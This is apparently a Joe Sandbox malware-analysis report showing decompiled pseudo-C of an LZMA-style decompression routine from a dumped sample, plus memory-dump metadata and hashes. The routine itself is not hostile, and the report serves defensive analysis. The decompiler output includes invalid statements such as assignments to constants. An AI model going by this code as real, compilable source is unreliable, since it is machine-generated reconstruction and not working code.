								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
